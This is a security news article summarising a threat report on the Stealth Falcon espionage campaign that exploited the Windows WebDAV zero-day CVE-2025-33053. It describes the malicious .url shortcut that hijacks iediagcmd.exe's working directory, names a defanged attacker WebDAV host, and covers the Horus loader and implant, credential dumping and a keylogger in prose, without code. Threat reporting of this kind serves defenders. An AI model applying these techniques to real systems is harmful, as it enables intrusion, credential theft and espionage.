Stealth Falcon Exploits New Zero-Day (CVE-2025-33053) in Sophisticated Cyberespionage Campaign

A new cyberespionage campaign attributed to the notorious APT group Stealth Falcon has been uncovered by Check Point Research (CPR), highlighting the weaponization of a zero-day vulnerability (CVE-2025-33053) in Microsoft Windows WebDAV. The sophisticated attacks, focused primarily on defense entities in the Middle East and Africa, leveraged .url files, living-off-the-land binaries (LOLBins), and a custom-built Mythic agent dubbed Horus to stealthily infiltrate high-profile targets.

“The attack used a .url file that exploited a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server,” CPR revealed in their threat report.

The vulnerability, patched by Microsoft on June 10, 2025, allows remote code execution via manipulated working directories. By crafting a malicious .url file, the attackers exploited Windows’ execution flow to substitute legitimate system binaries with malware hosted on attacker-controlled WebDAV servers.

In one case, a file titled TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url was submitted by a Turkish defense company. The shortcut was crafted to execute iediagcmd.exe—a legitimate Windows diagnostic tool—but redirected its working directory to a WebDAV server, causing it to run a malicious route.exe instead of the system binary.

“The iediagcmd tool will run the route.exe executable the attackers placed in \summerartcamp[.]net@ssl@443… instead of a legitimate one in system32,” CPR explained.

The attack chain is multi-staged and cleverly obfuscated. The initial .url file loads a C++ malware loader called Horus Loader, which employs:

• Code Virtualizer obfuscation
• Anti-debugging techniques
• Manual DLL mapping
• Decoy document execution
• Memory-resident payload injection

Horus Loader decrypts and displays a legitimate PDF while injecting a custom payload—entirely composed of IP-fuscated IPv6 strings—into a suspended process (msedge.exe), effectively hiding the payload in network syntax.

“What’s revealed is a large list of IPv6 addresses… converted into the payload using thousands of calls to RtlIpv6StringToAddressA,” the researchers wrote.

Once executed, the Horus Agent, a highly customized C++ implant built on the Mythic C2 framework, takes over. It communicates with a C2 infrastructure using AES encryption, HMAC integrity checks, and base64 encoding, and supports stealthy commands like:

• survey – Fingerprint target machine
• shinjectchunked – Shellcode injection in stealth mode
• upload – Data exfiltration
• exit – Clean termination

The implant implements string obfuscation, API hashing, control flow flattening, and dummy Windows API imports to evade static analysis.

“This is likely intended to confuse static analysis engines… observed in previous Stealth Falcon backdoors,” Check Point stated.

The campaign also revealed a robust post-compromise toolkit, including:

• DC Credential Dumper: Extracts NTDS.dit, SAM, and SYSTEM files from virtual disks to bypass live OS locks.
• Passive Backdoor: A lightweight AES-encrypted listener embedded in a fake “User Profile Service Check.”
• Custom Keylogger: Logs keystrokes to RC4-encrypted files in C:\Windows\Temp.

Check Point attributes the campaign to Stealth Falcon (a.k.a. FruityArmor) based on code similarities, infrastructure overlaps, and region-specific targeting. The APT group has a known history of espionage campaigns against:

• Government and military organizations
• Intelligence agencies
• Strategic technology companies

“Stealth Falcon’s activities are largely focused on the Middle East and Africa, with high-profile targets in the government and defense sectors observed in Turkey, Qatar, Egypt, and Yemen,” the report states.

The Horus Agent marks a significant evolution from Stealth Falcon’s earlier implants like Apollo, a .NET-based Mythic agent. Unlike Apollo, Horus is rewritten in C++, offers more stealth, and combines multiple injection techniques into unified, configurable modules.

Related Posts:

• HORUS Protector: The New Undetectable Malware Crypter Threatening Cybersecurity
• CrowdStrike Falcon Sensor Crash Triggers Global IT Outage, Emergency Workaround Released
• Microsoft’s June 2025 Patch Tuesday: 2 Zero-Days, 69 Vulnerabilities Patched!
• CrowdStrike Reveals Technical Details of Update Causing Windows Systems Crash
• CrowdStrike Addresses High-Severity TLS Vulnerability in Falcon Sensor for Linux (CVE-2025-1146)